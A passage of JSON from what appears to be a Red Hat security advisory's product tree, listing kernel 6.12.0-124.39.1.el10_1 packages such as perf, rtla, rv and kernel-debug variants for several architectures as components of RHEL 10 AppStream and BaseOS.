"name": "perf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.src as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.src",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
